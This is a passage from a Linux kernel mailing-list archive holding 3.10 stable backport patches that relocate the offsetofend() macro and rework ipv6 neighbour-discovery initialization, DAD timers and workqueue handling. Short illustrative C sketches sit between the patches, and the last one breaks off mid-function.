  2017-02-05 19:20 ` [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header Willy Tarreau
                   ` (102 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Gavin Shan, Alex Williamson, Willy Tarreau

From: Gavin Shan <gwshan@linux.vnet.ibm.com>

commit b13460b92093b29347e99d6c3242e350052b62cd upstream.

The macro offsetofend() introduces an unnecessary temporary variable
"tmp". The patch avoids that and saves a bit of stack memory.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: Alex Williamson <alex.williamson@redhat.com>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/vfio.h | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/include/linux/vfio.h b/include/linux/vfio.h
index ac8d488..1a7f0ac 100644
--- a/include/linux/vfio.h
+++ b/include/linux/vfio.h
@@ -86,8 +86,7 @@ extern void vfio_unregister_iommu_driver(
  * from user space.  This allows us to easily determine if the provided
  * structure is sized to include various fields.
  */
-#define offsetofend(TYPE, MEMBER) ({				\
-	TYPE tmp;						\
-	offsetof(TYPE, MEMBER) + sizeof(tmp.MEMBER); })		\
+#define offsetofend(TYPE, MEMBER) \
+	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
 
 #endif /* VFIO_H */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (115 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten Willy Tarreau
                   ` (101 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Denys Vlasenko, Alexei Starovoitov, Borislav Petkov,
	Frederic Weisbecker, H . Peter Anvin, Kees Cook, Oleg Nesterov,
	Steven Rostedt, Will Drewry, Ingo Molnar, Willy Tarreau

From: Denys Vlasenko <dvlasenk@redhat.com>

commit 3876488444e71238e287459c39d7692b6f718c3e upstream.

Suggested by Andy.
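
For readers unfamiliar with the helper being moved: offsetofend() yields the
offset of the first byte past a member, which is handy for checking whether
a variable-sized structure supplied by a caller is large enough to contain a
given field. The sketch below reuses the macro definition from the diff;
struct example_info and example_has_flags() are hypothetical and exist only
for illustration.

```c
#include <stddef.h>

/* Same definition as in the patch. */
#define offsetofend(TYPE, MEMBER) \
	(offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER))

/* Hypothetical structure whose leading field carries its own size. */
struct example_info {
	unsigned int argsz; /* size claimed by the caller */
	unsigned int flags;
	unsigned long long extra;
};

/* Return 1 if a structure of argsz bytes is big enough to hold 'flags'. */
int example_has_flags(size_t argsz)
{
	return argsz >= offsetofend(struct example_info, flags);
}
```

Because the macro uses sizeof on a member of a null pointer expression, no
object is ever created or dereferenced.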

Suggested-by: Andy Lutomirski <luto@amacapital.net>
Signed-off-by: Denys Vlasenko <dvlasenk@redhat.com>
Acked-by: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Alexei Starovoitov <ast@plumgrid.com>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Frederic Weisbecker <fweisbec@gmail.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Oleg Nesterov <oleg@redhat.com>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Will Drewry <wad@chromium.org>
Link: http://lkml.kernel.org/r/1425912738-559-1-git-send-email-dvlasenk@redhat.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/stddef.h |  9 +++++++++
 include/linux/vfio.h   | 13 -------------
 2 files changed, 9 insertions(+), 13 deletions(-)

diff --git a/include/linux/stddef.h b/include/linux/stddef.h
index f4aec0e..076af43 100644
--- a/include/linux/stddef.h
+++ b/include/linux/stddef.h
@@ -19,3 +19,12 @@ enum {
 #define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
 #endif
 #endif
+
+/**
+ * offsetofend(TYPE, MEMBER)
+ *
+ * @TYPE: The type of the structure
+ * @MEMBER: The member within the structure to get the end offset of
+ */
+#define offsetofend(TYPE, MEMBER) \
+	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
diff --git a/include/linux/vfio.h b/include/linux/vfio.h
index 1a7f0ac..ef4f737 100644
--- a/include/linux/vfio.h
+++ b/include/linux/vfio.h
@@ -76,17 +76,4 @@ extern int vfio_register_iommu_driver(const struct vfio_iommu_driver_ops *ops);
 extern void vfio_unregister_iommu_driver(
 				const struct vfio_iommu_driver_ops *ops);
 
-/**
- * offsetofend(TYPE, MEMBER)
- *
- * @TYPE: The type of the structure
- * @MEMBER: The member within the structure to get the end offset of
- *
- * Simple helper macro for dealing with variable sized structures passed
- * from user space.  This allows us to easily determine if the provided
- * structure is sized to include various fields.
- */
-#define offsetofend(TYPE, MEMBER) \
-	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
-
 #endif /* VFIO_H */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (116 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready Willy Tarreau
                   ` (100 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Joe Perches, Denys Vlasenko, Andrew Morton, Linus Torvalds,
	Willy Tarreau

From: Joe Perches <joe@perches.com>

commit 8c7fbe5795a016259445a61e072eb0118aaf6a61 upstream.

Commit 3876488444e7 ("include/stddef.h: Move offsetofend() from vfio.h
to a generic kernel header") added offsetofend outside the normal
include #ifndef/#endif guard.  Move it inside.

Miscellanea:

o remove unnecessary blank line
o standardize offsetof macros whitespace style

Signed-off-by: Joe Perches <joe@perches.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/stddef.h | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/include/linux/stddef.h b/include/linux/stddef.h
index 076af43..9c61c7c 100644
--- a/include/linux/stddef.h
+++ b/include/linux/stddef.h
@@ -3,7 +3,6 @@
 
 #include <uapi/linux/stddef.h>
 
-
 #undef NULL
 #define NULL ((void *)0)
 
@@ -14,10 +13,9 @@ enum {
 
 #undef offsetof
 #ifdef __compiler_offsetof
-#define offsetof(TYPE,MEMBER) __compiler_offsetof(TYPE,MEMBER)
+#define offsetof(TYPE, MEMBER)	__compiler_offsetof(TYPE, MEMBER)
 #else
-#define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
-#endif
+#define offsetof(TYPE, MEMBER)	((size_t)&((TYPE *)0)->MEMBER)
 #endif
 
 /**
@@ -28,3 +26,5 @@ enum {
  */
 #define offsetofend(TYPE, MEMBER) \
 	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
+
+#endif
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (117 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer Willy Tarreau
                   ` (99 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Michal Kubeček, David S . Miller, Mike Manning, Willy Tarreau

From: Michal Kubeček <mkubecek@suse.cz>

commit 2c861cc65ef4604011a0082e4dcdba2819aa191a upstream.

When loading the ipv6 module, ndisc_init() is called before
ip6_route_init(). As the former registers a handler calling
fib6_run_gc(), this opens a window to run the garbage collector
before the necessary data structures are initialized. If a network
device is initialized in this window, adding a MAC address to it
triggers a NETDEV_CHANGEADDR event, leading to a crash in
fib6_clean_all().

Take the event handler registration out of ndisc_init() into a
separate function ndisc_late_init() and move it after
ip6_route_init().
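
The ordering and unwind pattern can be sketched as below. All names here
(example_route_init(), example_late_init() and so on) are hypothetical
stand-ins for the real init functions, and the fail_late parameter exists
only to simulate a registration failure.

```c
/* State flags standing in for the real subsystems. */
int example_route_ready;
int example_notifier_registered;

static int example_route_init(void)
{
	example_route_ready = 1;
	return 0;
}

static void example_route_cleanup(void)
{
	example_route_ready = 0;
}

/* Register the event handler only once routing is ready. */
static int example_late_init(int fail_late)
{
	if (fail_late || !example_route_ready)
		return -1;
	example_notifier_registered = 1;
	return 0;
}

static void example_late_cleanup(void)
{
	example_notifier_registered = 0;
}

/* Init in dependency order; on failure, unwind in reverse order. */
int example_init(int fail_late)
{
	int err;

	err = example_route_init();
	if (err)
		goto route_fail;
	err = example_late_init(fail_late);
	if (err)
		goto late_fail;
	return 0;

late_fail:
	example_route_cleanup();
route_fail:
	return err;
}

/* Teardown mirrors init: unregister the handler before routing goes away. */
void example_exit(void)
{
	example_late_cleanup();
	example_route_cleanup();
}
```

The point of the split is that the handler can never fire while the data
it depends on is still uninitialized or already torn down.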

Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/ndisc.h |  2 ++
 net/ipv6/af_inet6.c |  6 ++++++
 net/ipv6/ndisc.c    | 18 +++++++++++-------
 3 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/include/net/ndisc.h b/include/net/ndisc.h
index 5043f8b..4b12d99 100644
--- a/include/net/ndisc.h
+++ b/include/net/ndisc.h
@@ -190,7 +190,9 @@ static inline struct neighbour *__ipv6_neigh_lookup(struct net_device *dev, cons
 }
 
 extern int			ndisc_init(void);
+extern int			ndisc_late_init(void);
 
+extern void			ndisc_late_cleanup(void);
 extern void			ndisc_cleanup(void);
 
 extern int			ndisc_rcv(struct sk_buff *skb);
diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
index a944f13..9443af7 100644
--- a/net/ipv6/af_inet6.c
+++ b/net/ipv6/af_inet6.c
@@ -900,6 +900,9 @@ static int __init inet6_init(void)
 	err = ip6_route_init();
 	if (err)
 		goto ip6_route_fail;
+	err = ndisc_late_init();
+	if (err)
+		goto ndisc_late_fail;
 	err = ip6_flowlabel_init();
 	if (err)
 		goto ip6_flowlabel_fail;
@@ -960,6 +963,8 @@ ipv6_exthdrs_fail:
 addrconf_fail:
 	ip6_flowlabel_cleanup();
 ip6_flowlabel_fail:
+	ndisc_late_cleanup();
+ndisc_late_fail:
 	ip6_route_cleanup();
 ip6_route_fail:
 #ifdef CONFIG_PROC_FS
@@ -1020,6 +1025,7 @@ static void __exit inet6_exit(void)
 	ipv6_exthdrs_exit();
 	addrconf_cleanup();
 	ip6_flowlabel_cleanup();
+	ndisc_late_cleanup();
 	ip6_route_cleanup();
 #ifdef CONFIG_PROC_FS
 
diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
index deedf7d..de10ccf 100644
--- a/net/ipv6/ndisc.c
+++ b/net/ipv6/ndisc.c
@@ -1716,24 +1716,28 @@ int __init ndisc_init(void)
 	if (err)
 		goto out_unregister_pernet;
 #endif
-	err = register_netdevice_notifier(&ndisc_netdev_notifier);
-	if (err)
-		goto out_unregister_sysctl;
 out:
 	return err;
 
-out_unregister_sysctl:
 #ifdef CONFIG_SYSCTL
-	neigh_sysctl_unregister(&nd_tbl.parms);
 out_unregister_pernet:
-#endif
 	unregister_pernet_subsys(&ndisc_net_ops);
 	goto out;
+#endif
 }
 
-void ndisc_cleanup(void)
+int __init ndisc_late_init(void)
+{
+	return register_netdevice_notifier(&ndisc_netdev_notifier);
+}
+
+void ndisc_late_cleanup(void)
 {
 	unregister_netdevice_notifier(&ndisc_netdev_notifier);
+}
+
+void ndisc_cleanup(void)
+{
 #ifdef CONFIG_SYSCTL
 	neigh_sysctl_unregister(&nd_tbl.parms);
 #endif
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (118 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue Willy Tarreau
                   ` (98 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Hannes Frederic Sowa, Flavio Leitner, Hideaki YOSHIFUJI,
	David Stevens, David S . Miller, Mike Manning, Willy Tarreau

From: Hannes Frederic Sowa <hannes@stressinduktion.org>

commit b7b1bfce0bb68bd8f6e62a28295922785cc63781 upstream.

This patch splits the timers for duplicate address detection and router
solicitations apart. The router solicitations timer goes into inet6_dev
and the dad timer stays in inet6_ifaddr.

The reason behind this patch is to reduce the number of unneeded router
solicitations sent out by the host if additional link-local addresses
are created. Currently we send out an RS for every link-local address on
an interface.

If the RS timer fires we pick a source address with ipv6_get_lladdr. This
change could hurt people adding additional link-local addresses and
specifying these addresses in the radvd clients section because we
no longer guarantee that we use every ll address as source address in
router solicitations.

Cc: Flavio Leitner <fleitner@redhat.com>
Cc: Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>
Cc: David Stevens <dlstevens@us.ibm.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Reviewed-by: Flavio Leitner <fbl@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
[Mike Manning <mmanning@brocade.com>: resolved conflicts with 36bddb]
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/if_inet6.h |   8 ++-
 net/ipv6/addrconf.c    | 136 ++++++++++++++++++++++++++-----------------------
 2 files changed, 79 insertions(+), 65 deletions(-)

diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h
index 100fb8c..3b558c6 100644
--- a/include/net/if_inet6.h
+++ b/include/net/if_inet6.h
@@ -50,7 +50,7 @@ struct inet6_ifaddr {
 
 	int			state;
 
-	__u8			probes;
+	__u8			dad_probes;
 	__u8			flags;
 
 	__u16			scope;
@@ -58,7 +58,7 @@ struct inet6_ifaddr {
 	unsigned long		cstamp;	/* created timestamp */
 	unsigned long		tstamp; /* updated timestamp */
 
-	struct timer_list	timer;
+	struct timer_list	dad_timer;
 
 	struct inet6_dev	*idev;
 	struct rt6_info		*rt;
@@ -195,6 +195,10 @@ struct inet6_dev {
 	struct inet6_dev	*next;
 	struct ipv6_devconf	cnf;
 	struct ipv6_devstat	stats;
+
+	struct timer_list	rs_timer;
+	__u8			rs_probes;
+
 	unsigned long		tstamp; /* ipv6InterfaceTable update timestamp */
 	struct rcu_head		rcu;
 };
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index d0912ac..4ff6a9c 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -253,37 +253,32 @@ static inline bool addrconf_qdisc_ok(const struct net_device *dev)
 	return !qdisc_tx_is_noop(dev);
 }
 
-static void addrconf_del_timer(struct inet6_ifaddr *ifp)
+static void addrconf_del_rs_timer(struct inet6_dev *idev)
 {
-	if (del_timer(&ifp->timer))
+	if (del_timer(&idev->rs_timer))
+		__in6_dev_put(idev);
+}
+
+static void addrconf_del_dad_timer(struct inet6_ifaddr *ifp)
+{
+	if (del_timer(&ifp->dad_timer))
 		__in6_ifa_put(ifp);
 }
 
-enum addrconf_timer_t {
-	AC_NONE,
-	AC_DAD,
-	AC_RS,
-};
+static void addrconf_mod_rs_timer(struct inet6_dev *idev,
+				  unsigned long when)
+{
+	if (!timer_pending(&idev->rs_timer))
+		in6_dev_hold(idev);
+	mod_timer(&idev->rs_timer, jiffies + when);
+}
 
-static void addrconf_mod_timer(struct inet6_ifaddr *ifp,
-			       enum addrconf_timer_t what,
-			       unsigned long when)
+static void addrconf_mod_dad_timer(struct inet6_ifaddr *ifp,
+				   unsigned long when)
 {
-	if (!del_timer(&ifp->timer))
+	if (!timer_pending(&ifp->dad_timer))
 		in6_ifa_hold(ifp);
-
-	switch (what) {
-	case AC_DAD:
-		ifp->timer.function = addrconf_dad_timer;
-		break;
-	case AC_RS:
-		ifp->timer.function = addrconf_rs_timer;
-		break;
-	default:
-		break;
-	}
-	ifp->timer.expires = jiffies + when;
-	add_timer(&ifp->timer);
+	mod_timer(&ifp->dad_timer, jiffies + when);
 }
 
 static int snmp6_alloc_dev(struct inet6_dev *idev)
@@ -326,6 +321,7 @@ void in6_dev_finish_destroy(struct inet6_dev *idev)
 
 	WARN_ON(!list_empty(&idev->addr_list));
 	WARN_ON(idev->mc_list != NULL);
+	WARN_ON(timer_pending(&idev->rs_timer));
 
 #ifdef NET_REFCNT_DEBUG
 	pr_debug("%s: %s\n", __func__, dev ? dev->name : "NIL");
@@ -357,7 +353,8 @@ static struct inet6_dev *ipv6_add_dev(struct net_device *dev)
 	rwlock_init(&ndev->lock);
 	ndev->dev = dev;
 	INIT_LIST_HEAD(&ndev->addr_list);
-
+	setup_timer(&ndev->rs_timer, addrconf_rs_timer,
+		    (unsigned long)ndev);
 	memcpy(&ndev->cnf, dev_net(dev)->ipv6.devconf_dflt, sizeof(ndev->cnf));
 	ndev->cnf.mtu6 = dev->mtu;
 	ndev->cnf.sysctl = NULL;
@@ -776,7 +773,7 @@ void inet6_ifa_finish_destroy(struct inet6_ifaddr *ifp)
 
 	in6_dev_put(ifp->idev);
 
-	if (del_timer(&ifp->timer))
+	if (del_timer(&ifp->dad_timer))
 		pr_notice("Timer is still running, when freeing ifa=%p\n", ifp);
 
 	if (ifp->state != INET6_IFADDR_STATE_DEAD) {
@@ -869,9 +866,9 @@ ipv6_add_addr(struct inet6_dev *idev, const struct in6_addr *addr, int pfxlen,
 
 	spin_lock_init(&ifa->lock);
 	spin_lock_init(&ifa->state_lock);
-	init_timer(&ifa->timer);
+	setup_timer(&ifa->dad_timer, addrconf_dad_timer,
+		    (unsigned long)ifa);
 	INIT_HLIST_NODE(&ifa->addr_lst);
-	ifa->timer.data = (unsigned long) ifa;
 	ifa->scope = scope;
 	ifa->prefix_len = pfxlen;
 	ifa->flags = flags | IFA_F_TENTATIVE;
@@ -994,7 +991,7 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp)
 	}
 	write_unlock_bh(&idev->lock);
 
-	addrconf_del_timer(ifp);
+	addrconf_del_dad_timer(ifp);
 
 	ipv6_ifa_notify(RTM_DELADDR, ifp);
 
@@ -1617,7 +1614,7 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed)
 {
 	if (ifp->flags&IFA_F_PERMANENT) {
 		spin_lock_bh(&ifp->lock);
-		addrconf_del_timer(ifp);
+		addrconf_del_dad_timer(ifp);
 		ifp->flags |= IFA_F_TENTATIVE;
 		if (dad_failed)
 			ifp->flags |= IFA_F_DADFAILED;
@@ -3085,7 +3082,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 		hlist_for_each_entry_rcu(ifa, h, addr_lst) {
 			if (ifa->idev == idev) {
 				hlist_del_init_rcu(&ifa->addr_lst);
-				addrconf_del_timer(ifa);
+				addrconf_del_dad_timer(ifa);
 				goto restart;
 			}
 		}
@@ -3094,6 +3091,8 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 
 	write_lock_bh(&idev->lock);
 
+	addrconf_del_rs_timer(idev);
+
 	/* Step 2: clear flags for stateless addrconf */
 	if (!how)
 		idev->if_flags &= ~(IF_RS_SENT|IF_RA_RCVD|IF_READY);
@@ -3123,7 +3122,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 	while (!list_empty(&idev->addr_list)) {
 		ifa = list_first_entry(&idev->addr_list,
 				       struct inet6_ifaddr, if_list);
-		addrconf_del_timer(ifa);
+		addrconf_del_dad_timer(ifa);
 
 		list_del(&ifa->if_list);
 
@@ -3165,10 +3164,10 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 
 static void addrconf_rs_timer(unsigned long data)
 {
-	struct inet6_ifaddr *ifp = (struct inet6_ifaddr *) data;
-	struct inet6_dev *idev = ifp->idev;
+	struct inet6_dev *idev = (struct inet6_dev *)data;
+	struct in6_addr lladdr;
 
-	read_lock(&idev->lock);
+	write_lock(&idev->lock);
 	if (idev->dead || !(idev->if_flags & IF_READY))
 		goto out;
 
@@ -3179,18 +3178,19 @@ static void addrconf_rs_timer(unsigned long data)
 	if (idev->if_flags & IF_RA_RCVD)
 		goto out;
 
-	spin_lock(&ifp->lock);
-	if (ifp->probes++ < idev->cnf.rtr_solicits) {
-		/* The wait after the last probe can be shorter */
-		addrconf_mod_timer(ifp, AC_RS,
-				   (ifp->probes == idev->cnf.rtr_solicits) ?
-				   idev->cnf.rtr_solicit_delay :
-				   idev->cnf.rtr_solicit_interval);
-		spin_unlock(&ifp->lock);
+	if (idev->rs_probes++ < idev->cnf.rtr_solicits) {
+		if (!__ipv6_get_lladdr(idev, &lladdr, IFA_F_TENTATIVE))
+			ndisc_send_rs(idev->dev, &lladdr,
+				      &in6addr_linklocal_allrouters);
+		else
+			goto out;
 
-		ndisc_send_rs(idev->dev, &ifp->addr, &in6addr_linklocal_allrouters);
+		/* The wait after the last probe can be shorter */
+		addrconf_mod_rs_timer(idev, (idev->rs_probes ==
+					     idev->cnf.rtr_solicits) ?
+				      idev->cnf.rtr_solicit_delay :
+				      idev->cnf.rtr_solicit_interval);
 	} else {
-		spin_unlock(&ifp->lock);
 		/*
 		 * Note: we do not support deprecated "all on-link"
 		 * assumption any longer.
@@ -3199,8 +3199,8 @@ static void addrconf_rs_timer(unsigned long data)
 	}
 
 out:
-	read_unlock(&idev->lock);
-	in6_ifa_put(ifp);
+	write_unlock(&idev->lock);
+	in6_dev_put(idev);
 }
 
 /*
@@ -3216,8 +3216,8 @@ static void addrconf_dad_kick(struct inet6_ifaddr *ifp)
 	else
 		rand_num = net_random() % (idev->cnf.rtr_solicit_delay ? : 1);
 
-	ifp->probes = idev->cnf.dad_transmits;
-	addrconf_mod_timer(ifp, AC_DAD, rand_num);
+	ifp->dad_probes = idev->cnf.dad_transmits;
+	addrconf_mod_dad_timer(ifp, rand_num);
 }
 
 static void addrconf_dad_start(struct inet6_ifaddr *ifp)
@@ -3278,40 +3278,40 @@ static void addrconf_dad_timer(unsigned long data)
 	struct inet6_dev *idev = ifp->idev;
 	struct in6_addr mcaddr;
 
-	if (!ifp->probes && addrconf_dad_end(ifp))
+	if (!ifp->dad_probes && addrconf_dad_end(ifp))
 		goto out;
 
-	read_lock(&idev->lock);
+	write_lock(&idev->lock);
 	if (idev->dead || !(idev->if_flags & IF_READY)) {
-		read_unlock(&idev->lock);
+		write_unlock(&idev->lock);
 		goto out;
 	}
 
 	spin_lock(&ifp->lock);
 	if (ifp->state == INET6_IFADDR_STATE_DEAD) {
 		spin_unlock(&ifp->lock);
-		read_unlock(&idev->lock);
+		write_unlock(&idev->lock);
 		goto out;
 	}
 
-	if (ifp->probes == 0) {
+	if (ifp->dad_probes == 0) {
 		/*
 		 * DAD was successful
 		 */
 
 		ifp->flags &= ~(IFA_F_TENTATIVE|IFA_F_OPTIMISTIC|IFA_F_DADFAILED);
 		spin_unlock(&ifp->lock);
-		read_unlock(&idev->lock);
+		write_unlock(&idev->lock);
 
 		addrconf_dad_completed(ifp);
 
 		goto out;
 	}
 
-	ifp->probes--;
-	addrconf_mod_timer(ifp, AC_DAD, ifp->idev->nd_parms->retrans_time);
+	ifp->dad_probes--;
+	addrconf_mod_dad_timer(ifp, ifp->idev->nd_parms->retrans_time);
 	spin_unlock(&ifp->lock);
-	read_unlock(&idev->lock);
+	write_unlock(&idev->lock);
 
 	/* send a neighbour solicitation for our addr */
 	addrconf_addr_solict_mult(&ifp->addr, &mcaddr);
@@ -3323,6 +3323,9 @@ out:
 static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
 {
 	struct net_device *dev = ifp->idev->dev;
+	struct in6_addr lladdr;
+
+	addrconf_del_dad_timer(ifp);
 
 	/*
 	 *	Configure the address for reception. Now it is valid.
@@ -3343,13 +3346,20 @@ static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
 		 *	[...] as part of DAD [...] there is no need
 		 *	to delay again before sending the first RS
 		 */
-		ndisc_send_rs(ifp->idev->dev, &ifp->addr, &in6addr_linklocal_allrouters);
+		if (!ipv6_get_lladdr(dev, &lladdr, IFA_F_TENTATIVE))
+			ndisc_send_rs(dev, &lladdr,
+				      &in6addr_linklocal_allrouters);
+		else
+			return;
 
-		spin_lock_bh(&ifp->lock);
-		ifp->probes = 1;
+		write_lock_bh(&ifp->idev->lock);
+		spin_lock(&ifp->lock);
+		ifp->idev->rs_probes = 1;
 		ifp->idev->if_flags |= IF_RS_SENT;
-		addrconf_mod_timer(ifp, AC_RS, ifp->idev->cnf.rtr_solicit_interval);
-		spin_unlock_bh(&ifp->lock);
+		addrconf_mod_rs_timer(ifp->idev,
+				      ifp->idev->cnf.rtr_solicit_interval);
+		spin_unlock(&ifp->lock);
+		write_unlock_bh(&ifp->idev->lock);
 	}
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (119 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed Willy Tarreau
                   ` (97 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Hannes Frederic Sowa, Stephen Hemminger, David S . Miller,
	Mike Manning, Willy Tarreau

From: Hannes Frederic Sowa <hannes@stressinduktion.org>

commit c15b1ccadb323ea50023e8f1cca2954129a62b51 upstream.

addrconf_join_solict and addrconf_join_anycast may cause actions which
need rtnl locked, especially on first address creation.

A new DAD state is introduced which defers the initial DAD processing
to a workqueue.

To get rtnl lock we need to push the code paths which depend on those
calls up to workqueues, specifically addrconf_verify and the DAD
processing.

(v2)
addrconf_dad_failure needs to be queued up to the workqueue, too. This
patch introduces a new DAD state and stops the DAD processing in the
workqueue (this is because of the possible ipv6_del_addr processing
which removes the solicited multicast address from the device).

addrconf_verify_lock is removed, too. After the transition it is not
needed any more.

As we are no longer processing in bottom half context, we need to be a
bit more careful about disabling bottom halves when we take spinlocks
that are also used in bh context.
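
To illustrate the state handling described above, here is a minimal
userspace sketch of the decision made at the top of addrconf_dad_work().
It is only a model: the enum ordering follows the if_inet6.h hunk in this
patch, but the STATE_* names and dad_work_decide() are hypothetical, and
no locking or workqueue is involved.

```c
#include <assert.h>
#include <stddef.h>

/* Model of the address states after this patch (names shortened;
 * ordering follows the enum in include/net/if_inet6.h). */
enum ifaddr_state {
	STATE_PREDAD,
	STATE_DAD,
	STATE_POSTDAD,
	STATE_ERRDAD,
	STATE_UP,
	STATE_DEAD,
};

/* Same three actions as the local enum in addrconf_dad_work(). */
enum dad_action {
	DAD_PROCESS,
	DAD_BEGIN,
	DAD_ABORT,
};

/* Hypothetical helper: pick the action for the work item and advance
 * the state. The kernel does this under ifp->state_lock. */
static enum dad_action dad_work_decide(enum ifaddr_state *state)
{
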